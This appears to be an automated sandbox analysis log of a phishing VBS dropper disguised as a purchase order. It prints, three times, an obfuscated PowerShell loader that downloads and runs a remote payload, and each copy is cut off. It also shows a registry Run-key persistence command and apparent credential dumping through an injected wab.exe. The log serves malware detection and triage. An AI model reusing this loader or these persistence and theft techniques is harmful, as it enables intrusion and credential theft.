Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
Source: amsi32_3892.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3892, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@25/11@3/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 16_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 18_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 16_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 16_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 16_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Kasinoerne.Pri Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-LDOW5Q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvpnexgb.hba.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1908
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3892
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000B.00000002.3444830875.00000000216F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000010.00000002.2603925178.0000000005343000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
